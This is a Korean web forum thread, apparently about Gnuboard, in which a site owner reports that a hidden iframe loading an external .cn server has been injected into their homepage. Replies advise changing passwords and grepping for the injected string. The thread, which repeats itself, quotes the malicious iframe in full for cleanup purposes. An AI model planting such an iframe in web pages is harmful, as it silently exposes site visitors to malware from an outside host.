악성코드 공격받았습니다. 도와주세요. 정보
악성코드 공격받았습니다. 도와주세요.본문
갑자기 홈페이지가 밑으로 내려가 보여서 소스를 확인해 보니, 아래와 같은 코드가 삽입되어 있더라구요. head_sub.php 파일에도 저 코드가 없는데, 도대체 어디서 삭제를 해야하는지요??
저 코드가 떡하니 상단에 삽입되어 있으니, 홈페이지가 밑으로 쳐져서 보입니다.
고수님들 도와주세요..ㅠㅠ
<iframe src="http://greatmixlot.cn:8080/ts/in.cgi?pepsi61" width=125 height=125 style="visibility: hidden"></iframe>
저 코드가 떡하니 상단에 삽입되어 있으니, 홈페이지가 밑으로 쳐져서 보입니다.
고수님들 도와주세요..ㅠㅠ
<iframe src="http://greatmixlot.cn:8080/ts/in.cgi?pepsi61" width=125 height=125 style="visibility: hidden"></iframe>
댓글 전체
FTP, TELNET 비번바꾸시구요
그누 비번도 변경해 주시구요.
변경된 파일시간 이랑 로그파일 비교해 보세요.
단순해킹같네요. db도 노출되었을 수 있으니 찜찜하면 db도 바꿔주시구요
find . | xargs grep "pepsi61"
telnet 들어가서 위를 넣고 파일 찾아서 삭제해 주세요
그누 비번도 변경해 주시구요.
변경된 파일시간 이랑 로그파일 비교해 보세요.
단순해킹같네요. db도 노출되었을 수 있으니 찜찜하면 db도 바꿔주시구요
find . | xargs grep "pepsi61"
telnet 들어가서 위를 넣고 파일 찾아서 삭제해 주세요